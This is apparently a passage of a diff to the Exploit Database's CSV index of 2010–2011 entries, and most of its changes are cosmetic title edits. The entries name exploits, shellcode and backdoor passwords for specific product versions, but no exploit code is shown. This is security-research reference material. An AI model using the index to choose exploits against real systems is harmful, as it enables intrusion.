CreateWindow Function Callback Vulnerability (MS10-048)",2010-08-10,"Core Security",windows,dos,0 @@ -12950,7 +12950,7 @@ id,file,description,date,author,platform,type,port 14848,platforms/php/webapps/14848.txt,"Web-Ideas Web Shop Standard SQL Injection Vulnerability",2010-08-31,Ariko-Security,php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 -14852,platforms/windows/dos/14852.txt,"leadtools activex common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 +14852,platforms/windows/dos/14852.txt,"leadtools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 @@ -12964,12 +12964,12 @@ id,file,description,date,author,platform,type,port 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com, Dell, SMC, Foundry and EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 -14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 +14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 -14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 +14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 @@ -13084,7 +13084,7 @@ id,file,description,date,author,platform,type,port 15056,platforms/windows/remote/15056.py,"Java CMM readMabCurveData - Stack Overflow",2010-09-20,Abysssec,windows,remote,0 15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 -15061,platforms/windows/dos/15061.txt,"Microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 +15061,platforms/windows/dos/15061.txt,"Microsoft drm technology (msnetobj.dll) ActiveX Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 @@ -13161,7 +13161,7 @@ id,file,description,date,author,platform,type,port 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion Vulnerability",2010-10-01,LiquidWorm,php,webapps,0 15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 -15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution (MSF)",2010-10-01,Trancer,windows,remote,0 +15168,platforms/windows/remote/15168.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (MSF)",2010-10-01,Trancer,windows,remote,0 15169,platforms/php/webapps/15169.txt,"Evaria Content Management System 1.1 File Disclosure Vulnerability",2010-10-01,"khayeye shotor",php,webapps,0 15171,platforms/php/webapps/15171.txt,"jCart 1.1 - Multiple XSS/CSRF/Open Redirect Vulnerabilities",2010-10-01,p0deje,php,webapps,0 15173,platforms/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,php,webapps,0 @@ -13539,7 +13539,7 @@ id,file,description,date,author,platform,type,port 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload Vulnerability",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 Persistent XSS Vulnerabilities",2010-11-30,"Shichemt Alen",php,webapps,0 15638,platforms/php/webapps/15638.txt,"Duhok Forum <= 1.1 - Remote File Upload Vulnerability",2010-11-30,BrOx-Dz,php,webapps,0 -15639,platforms/php/webapps/15639.txt,"Pandora Fms <= 3.1 Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15639,platforms/php/webapps/15639.txt,"Pandora Fms <= 3.1 - Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 15640,platforms/php/webapps/15640.txt,"Pandora Fms <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15641,platforms/php/webapps/15641.txt,"Pandora Fms <= 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 15642,platforms/php/webapps/15642.txt,"Pandora Fms <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 @@ -13566,7 +13566,7 @@ id,file,description,date,author,platform,type,port 15664,platforms/ios/remote/15664.txt,"iOS iFTPStorage <= 1.3 - Directory Traversal",2010-12-03,XEL,ios,remote,0 15665,platforms/asp/webapps/15665.txt,"Easy Travel Portal 2 - (travelbycountry.asp) SQL Injection Vulnerability",2010-12-03,"Ulrik Persson",asp,webapps,0 15666,platforms/hardware/webapps/15666.txt,"Multiple D-Link Router Models Authentication Bypass Vulnerability",2010-12-03,"Craig Heffner",hardware,webapps,0 -15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 +15668,platforms/windows/remote/15668.html,"Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow",2010-12-03,Dr_IDE,windows,remote,0 15669,platforms/windows/dos/15669.py,"Mediamonkey 3.2.4.1304 - (mp3) Buffer Overflow Vulnerability PoC",2010-12-04,0v3r,windows,dos,0 15670,platforms/windows/dos/15670.pl,"Free Audio Converter 7.1.5 - Denial of Service Vulnerability PoC",2010-12-04,h1ch4m,windows,dos,0 15671,platforms/windows/dos/15671.pl,"WaveMax Sound Editor 4.5.1 - Denial of Service PoC",2010-12-04,h1ch4m,windows,dos,0 @@ -13622,7 +13622,7 @@ id,file,description,date,author,platform,type,port 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow (0day)",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - Activex Exploit (PrintControl.dll) (0day)",2010-12-14,Dr_IDE,windows,remote,0 +15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - ActiveX Exploit (PrintControl.dll) (0day)",2010-12-14,Dr_IDE,windows,remote,0 15735,platforms/php/webapps/15735.txt,"MantisBT <= 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 15736,platforms/php/webapps/15736.txt,"MantisBT <= 1.2.3 (db_type) - Local File Inclusion Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - LFI Vulnerability (0day)",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 @@ -13672,7 +13672,7 @@ id,file,description,date,author,platform,type,port 15786,platforms/windows/dos/15786.py,"Accmeware MP3 Joiner Pro 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 15787,platforms/windows/dos/15787.py,"Accmeware MP3 Speed 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - DoS PoC",2010-12-20,0v3r,windows,dos,0 -15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 Authentication Bypass Vulnerability",2010-12-20,R4dc0re,php,webapps,0 +15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass Vulnerability",2010-12-20,R4dc0re,php,webapps,0 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0 15791,platforms/php/webapps/15791.txt,"Joomla Component Jotloader 2.2.1 - Local File Inclusion Vulnerability",2010-12-20,v3n0m,php,webapps,0 15792,platforms/hardware/dos/15792.php,"Apple iPhone Safari (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 @@ -13693,7 +13693,7 @@ id,file,description,date,author,platform,type,port 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit (0day)",2010-12-22,WooYun,windows,remote,0 -15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 Authentication Bypass Vulnerability",2010-12-23,"Craig Heffner",hardware,webapps,0 +15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 - Authentication Bypass Vulnerability",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15813,platforms/php/webapps/15813.txt,"IPN Development Handler 2.0 - Multiple Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -13741,11 +13741,11 @@ id,file,description,date,author,platform,type,port 15863,platforms/php/webapps/15863.txt,"lightneasy 3.2.2 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15864,platforms/php/webapps/15864.txt,"Ignition 1.3 (page.php) Local File Inclusion Vulnerability",2010-12-30,cOndemned,php,webapps,0 15865,platforms/php/webapps/15865.php,"Ignition 1.3 - Remote Code Execution Exploit",2010-12-30,cOndemned,php,webapps,0 -15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 +15866,platforms/windows/remote/15866.html,"Chilkat Software FTP2 - ActiveX Component Remote Code Execution",2010-12-30,rgod,windows,remote,0 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary (src .php) File Download",2010-12-30,"Yakir Wizman",windows,remote,0 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0 15879,platforms/windows/shellcode/15879.txt,w32-speaking-shellcode,2010-12-31,Skylined,windows,shellcode,0 -15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 +15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0 15886,platforms/php/webapps/15886.txt,"KLINK SQL Injection Vulnerability",2011-01-01,"Mauro Rossi and Andres Gomez",php,webapps,0 15887,platforms/php/webapps/15887.txt,"ChurchInfo <= 1.2.12 SQL Injection Vulnerability",2011-01-01,dun,php,webapps,0 15888,platforms/windows/local/15888.c,"Bywifi 2.8.1 - Stack Buffer Overflow Exploit",2011-01-01,anonymous,windows,local,0 @@ -13835,7 +13835,7 @@ id,file,description,date,author,platform,type,port 16011,platforms/php/webapps/16011.txt,"CakePHP <= 1.3.5 / 1.2.8 unserialize() Vulnerability",2011-01-18,felix,php,webapps,0 16012,platforms/windows/dos/16012.html,"Google Chrome 8.0.552.237 - address Overflow DoS",2011-01-18,"Vuk Ivanovic",windows,dos,0 16013,platforms/php/webapps/16013.html,"N-13 News 3.4 - Remote Admin Add CSRF Exploit",2011-01-18,anT!-Tr0J4n,php,webapps,0 -16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 +16014,platforms/windows/remote/16014.html,"Novell iPrint <= 5.52 - ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)",2011-01-19,Dr_IDE,windows,remote,0 16016,platforms/php/webapps/16016.txt,"Simploo CMS 1.7.1 PHP Code Execution",2011-01-19,"David Vieira-Kurz",php,webapps,0 16018,platforms/php/webapps/16018.txt,"PHP auctions (viewfaqs.php) Blind SQL Injection Vulnerability",2011-01-19,"BorN To K!LL",php,webapps,0 16019,platforms/php/webapps/16019.txt,"Phpcms 2008 SQL Injection Vulnerability",2011-01-20,R3d-D3V!L,php,webapps,0 @@ -14079,7 +14079,7 @@ id,file,description,date,author,platform,type,port 16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-20,metasploit,multiple,remote,0 16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,metasploit,multiple,remote,0 16311,platforms/linux/remote/16311.rb,"wu-ftpd SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0 -16312,platforms/multiple/remote/16312.rb,"Axis2 Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0 +16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0 16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,metasploit,php,webapps,0 16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,metasploit,multiple,remote,0 16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,metasploit,multiple,remote,0 @@ -14232,7 +14232,7 @@ id,file,description,date,author,platform,type,port 16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 +16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 - Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 16466,platforms/win32/remote/16466.rb,"Arkeia Backup Client Type 77 - Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0 @@ -14244,7 +14244,7 @@ id,file,description,date,author,platform,type,port 16474,platforms/windows/remote/16474.rb,"Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow",2010-07-01,metasploit,windows,remote,0 16475,platforms/windows/remote/16475.rb,"MailEnable IMAPD (2.35) Login Request Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16476,platforms/windows/remote/16476.rb,"Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,metasploit,windows,remote,0 +16477,platforms/windows/remote/16477.rb,"Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow",2010-06-22,metasploit,windows,remote,0 16478,platforms/windows/remote/16478.rb,"Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16479,platforms/windows/remote/16479.rb,"IMail IMAP4D Delete Overflow",2010-09-20,metasploit,windows,remote,0 16480,platforms/windows/remote/16480.rb,"MailEnable IMAPD W3C Logging Buffer Overflow",2010-06-15,metasploit,windows,remote,0 @@ -14272,9 +14272,9 @@ id,file,description,date,author,platform,type,port 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16503,platforms/windows/local/16503.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-04-30,metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,metasploit,windows,local,0 -16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16506,platforms/windows/remote/16506.rb,"Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",2010-07-16,metasploit,windows,remote,0 -16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,metasploit,windows,remote,0 +16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,metasploit,windows,remote,0 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox Interleaving document.write and appendChild Exploit",2011-02-22,metasploit,windows,remote,0 16510,platforms/windows/remote/16510.rb,"McAfee Subscription Manager Stack Buffer Overflow",2010-07-03,metasploit,windows,remote,0 @@ -14286,8 +14286,8 @@ id,file,description,date,author,platform,type,port 16516,platforms/windows/remote/16516.rb,"Microsoft WMI Administration Tools ActiveX Buffer Overflow",2011-01-14,metasploit,windows,remote,0 16517,platforms/windows/remote/16517.rb,"IBM Access Support ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16518,platforms/windows/remote/16518.rb,"Chilkat Crypt ActiveX WriteFile Unsafe Method",2010-09-20,metasploit,windows,remote,0 -16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow",2010-09-20,metasploit,windows,remote,0 +16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 +16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow",2010-09-20,metasploit,windows,remote,0 16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client ActiveX Control target-frame Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14355,15 +14355,15 @@ id,file,description,date,author,platform,type,port 16585,platforms/windows/remote/16585.rb,"Sun Java Web Start Plugin Command Line Argument Injection",2010-09-21,metasploit,windows,remote,0 16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer SMIL Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,metasploit,windows,remote,0 -16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,metasploit,windows,local,0 16590,platforms/windows/remote/16590.rb,"Internet Explorer DHTML Behaviors Use After Free",2010-12-14,metasploit,windows,remote,0 -16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 +16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 16597,platforms/windows/remote/16597.rb,"Internet Explorer VML Fill Method Code Execution",2010-07-03,metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload ActiveX MakeHttpRequest Directory Traversal",2010-11-11,metasploit,windows,remote,0 16599,platforms/windows/remote/16599.rb,"Internet Explorer ""Aurora"" Memory Corruption",2010-07-12,metasploit,windows,remote,0 @@ -14377,7 +14377,7 @@ id,file,description,date,author,platform,type,port 16607,platforms/windows/remote/16607.rb,"WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 +16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 @@ -14556,7 +14556,7 @@ id,file,description,date,author,platform,type,port 16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,7144 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,metasploit,cfm,webapps,0 -16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",2010-11-24,metasploit,multiple,remote,8080 +16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 @@ -14625,7 +14625,7 @@ id,file,description,date,author,platform,type,port 16855,platforms/linux/remote/16855.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)",2010-09-20,metasploit,linux,remote,0 16856,platforms/cgi/webapps/16856.rb,"DD-WRT HTTP Daemon Arbitrary Command Execution",2010-07-07,metasploit,cgi,webapps,0 16857,platforms/cgi/webapps/16857.rb,"Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",2010-10-05,metasploit,cgi,webapps,0 -16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution",2010-10-18,metasploit,php,webapps,0 +16858,platforms/php/webapps/16858.rb,"RedHat Piranha Virtual Server Package passwd.php3 - Arbitrary Command Execution",2010-10-18,metasploit,php,webapps,0 16859,platforms/linux/remote/16859.rb,"Samba lsa_io_trans_names Heap Overflow",2010-07-14,metasploit,linux,remote,0 16860,platforms/linux/remote/16860.rb,"Samba chain_reply Memory Corruption (Linux x86)",2010-09-04,metasploit,linux,remote,0 16861,platforms/linux/remote/16861.rb,"Samba trans2open Overflow (Linux x86)",2010-07-14,metasploit,linux,remote,0 @@ -14664,7 +14664,7 @@ id,file,description,date,author,platform,type,port 16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE base_qry_common Remote File Include",2010-11-24,metasploit,php,webapps,0 -16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 Arbitrary PHP Code Execution",2010-07-03,metasploit,php,webapps,0 +16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,metasploit,php,webapps,0 16901,platforms/php/webapps/16901.rb,"PAJAX Remote Command Execution",2010-04-30,metasploit,php,webapps,0 16902,platforms/php/webapps/16902.rb,"CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit",2011-01-14,metasploit,php,webapps,0 16903,platforms/php/remote/16903.rb,"OpenX banner-edit.php File Upload PHP Code Execution",2010-09-20,metasploit,php,remote,0 @@ -14790,7 +14790,7 @@ id,file,description,date,author,platform,type,port 17032,platforms/windows/dos/17032.txt,"VMCPlayer 1.0 - Denial of Service",2011-03-23,BraniX,windows,dos,0 17033,platforms/windows/dos/17033.py,"IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS",2011-03-23,"Jeremy Brown",windows,dos,0 17034,platforms/windows/remote/17034.py,"Progea Movicon 11 TCPUploadServer Remote Exploit",2011-03-23,"Jeremy Brown",windows,remote,0 -17035,platforms/php/webapps/17035.pl,"Constructr CMS 3.03 Arbitrary File Upload",2011-03-23,plucky,php,webapps,0 